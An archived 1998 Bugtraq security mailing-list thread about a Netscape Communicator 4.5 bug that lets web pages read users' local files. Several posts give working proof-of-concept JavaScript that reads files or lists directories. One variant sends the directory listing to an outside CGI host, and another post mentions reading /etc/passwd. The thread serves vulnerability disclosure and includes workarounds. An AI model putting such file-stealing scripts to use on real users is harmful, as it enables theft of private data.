|
[ http://www.rootshell.com/ ] Date: Mon, 23 Nov 1998 10:36:40 PST From: Georgi Guninski <guninski@HOTMAIL.COM> Subject: Netscape Communicator 4.5 can read local files There is a bug in Netscape Communicator 4.5 for Windows 95 and 4.05 for WinNT 4.0 (probably others) which allows reading files from the user's computer. It is not necessary the file name to be known, because directories may be browsed. The contents of the file may be sent to an arbitrary host. In order this to work, you need both Java and Javascript enabled. The bug may be exploited by email message. Demonstration is available at: http://www.geocities.com/ResearchTriangle/1711/b6.html Workaround: Disable Javascript or Java. The Javascript code is: sl=window.open("wysiwyg://1/file:///C|/"); sl2=sl.window.open(); sl2.location="javascript:s='<SCRIPT>b=\"Here is the beginning of your file: \";var f = new java.io.File(\"C:\\\\\\\\test.txt\");var fis = new java.io.FileInputStream(f); i=0; while ( ((a=fis.read()) != -1) && (i<100) ) { b += String.fromCharCode(a);i++;}alert(b);</'+'SCRIPT>'"; Regards, Georgi Guninski http://www.geocities.com/ResearchTriangle/1711 Date: Mon, 23 Nov 1998 20:49:37 +0000 From: The Spirit of the Black Panther <panther@DSIS.NET> Subject: Re: Netscape Communicator 4.5 can read local files I have just tested this bug in Netscape 4.5 on a RedHat Linux 5.1 machine, Kermel 2.0.34 and with minor patching of the java, it is also effective. I was sucessful in retrieving ANY LOCAL FILE with the World readable attribute. This includes the /etc/passwd file! In netscape, Edit>Preferences>Advanced>Disable Javascript in Mail and News will block this exploit, unless the person has access to your web server. Date: Tue, 24 Nov 1998 20:23:25 -0800 From: Ryan Russell <Ryan.Russell@SYBASE.COM> Subject: Re: Netscape Communicator 4.5 can read local files It's vastly different. Did you try creating c:\test.txt and putting something in it, and going to that page? Notice that it pops the first line in a dialog box. That means it has that info under programmatic contol, and can send it across the network back to the web server, exactly as claimed in the original advisory. Contrast that with (you) opening your c: drive with Communicator. You can browse local files, but only you get to see the contents, and that window isn't under any kind of programmatic control >from other windows... at least that's how it's supposed to work. It's similar to the Java sandbox concept. Local and signed content are "trusted" and can do whatever they like, whereas remotely loaded content are "untrusted" and aren't supposed to be able to perform certain operations. When you (well, Netscape and Microsoft) try to mix the two, invariably mistakes will be made, and leaks will happen between the two. Ryan ---------------------------------------------------------------- Date: Wed, 25 Nov 1998 15:28:45 -0500 From: Terence Christopher Haddock <haddock@UDEL.EDU> Reply-To: thaddock@poboxes.com Subject: Re: Netscape Communicator 4.5 can read local files This security hole is not limited to knowing a specific file name, it can be used to list the contents of a directory, which I believe is much more insidious. This script can send a list of the files in the user's root directory under windows: sl=window.open("wysiwyg://1/file://C|/"); sl2=sl.window.open(); sl2.location="javascript:"+ "b=\"Here is the files in your root directory:\";"+ "var f=new java.io.file(\"C:\\\\\");"+ "var files=f.list();"+ "for (var x=0;x<files.length;x++){"+ "b+=files[x]+\"\n\""+ "};"+ "alert(b);"; (Simple to modify it for UNIX) Using a search algorithm the script could search for specific files by running this recursively. The only problem (from a hacker's perspective, a good thing from our perspective) is all of the windows it would open. If a way could be worked around this (which I think it can), this script could run without a user even knowing it, searching the user's directories and reporting them to a server. Sincerely, Terence C. Haddock ---------------------------------------------------------------- Terence Christopher Haddock (haddock@UDEL.EDU) Wed, 25 Nov 1998 14:22:12 -0500 Ben Collin's file contains the text "this is really stupid.". He's running an UNIX version of Netscape, so I had to modify the script. Unfortunately, the following does not work under both UNIX and Windows: sl=window.open("wysiwyg://1/file://"); It works under UNIX, but not under Windows. A simple check of the OS would take care of the distinction, however, so that wouldn't slow any would-be hackers down. Also, if they know their target, then they know what kind of OS they're dealing with. Sincerely, Terence C. Haddock University of Delaware On Wed, 25 Nov 1998, Ben Collins wrote: > I would just like to say that I find it hard to believe so much fuss has > been made about this. It is clear that this is only a local 'trick' to > look like it has gotten info. There used to be earlier versions of this > where ppl would make a link to file:///C|/ and say they had your hardrive > contents on their webpage, and now that java/javascript is involved > everyone is freaking out over the same thing just done a litte more > elaborately. > > If some one here can setup a webpage, send me the URL, have that page read > the file '/test.txt' from my hardrive and then that person send the > contents to this list, I will believe. Otherwise I think this whole > hysteria over 'unforseen' dangers should stop. > > -- > ----- -- - -------- --------- ---- ------- ----- - - --- -------- > Ben Collins <b.m.collins@larc.nasa.gov> Debian GNU/Linux > UnixGroup Admin - Jordan Systems Inc. bcollins@debian.org > ------ -- ----- - - ------- ------- -- The Choice of the GNU Generation ---------------------------------------------------------------- Date: Thu, 26 Nov 1998 12:31:35 +0100 From: Michael Teichmann <teichmann@TECMATH.DE> To: BUGTRAQ@netspace.org Subject: Re: Netscape Communicator 4.5 can read local files > I've whipped up a couple of demos of this bug that send the contents to a > cgi. There is a windows version that I know works, and a unix version I > can't test because my linux box is down (it's a hardware thing). This is > for anyone who has doubts.... > > http://www.kics.bc.ca/~trev/cgi-bin/test.html (Windoze) > > http://www.kics.bc.ca/~trev/cgi-bin/test-unix.html (UNIX) > > And yes, it can email it to you if you like :) And if you wish, it can even read your directory structure: (works for Win, but Unix should be straightforward) //slight change of Trev's script: <SCRIPT> alert("List your files in C:\\ and it will be sent to a cgi script."); sl=window.open("wysiwyg://1/file:///C|/"); sl2=sl.window.open(); sl2.location="javascript:s='<SCRIPT>b=\"\";var f = new java.io.File(\"C:\\\\\\\\\"); var fl=f.list(); i=0; while(i < fl.length) {b += fl[i]+\"\\\\n\"; i++;}w=window.open(\"http://www.kics.bc.ca/~trev/cgi-bin/query_string.cgi?\"+escape(b));</'+'SCRIPT>'"; </SCRIPT> At least it seems it can not *write* to local files, I get a security exception when I try that. ---------------------------------------------------------------- Date: Thu, 26 Nov 1998 17:43:31 +0100 From: Norbert Luckhardt <nl@CT.HEISE.DE> To: BUGTRAQ@netspace.org Subject: Re: Netscape Communicator 4.5 can read local files -----BEGIN PGP SIGNED MESSAGE----- Hi there, At 19:36 23.11.98 , you wrote: >There is a bug in Netscape Communicator 4.5 for Windows 95 and 4.05 for >WinNT 4.0 (probably others) we just tried it on the Mac - surely the script has to be adapted since the mac doesn't use drive letters - so if You don't know the names of the drive you cannot give an absolute path - but it could work with relative paths: sl=window.open("wysiwyg://1/file:////"); those 4 slashes show the directory in which netscape is installed (every extra slash goes one dir up) it is at least possible to get files from that directory with: java.io.File(\"test.txt\") alas I'm not so firm with JavaScript and thus I did not get a working code with the quoting for higher dir levels - earned only JavaScript Errors but I think this is only my personal problem, isn't it?! ;-) have fun, Shalom dann, NOrbert -- Norbert Luckhardt http://www.heise.de/ct/Redaktion/nl/ Redaktion c't Tel.: +49 511 5352 - 300 Fax: +49 511 5352 - 417 Helstorfer Str. 7 D-30625 Hannover BBS: +49 511 5352 - 301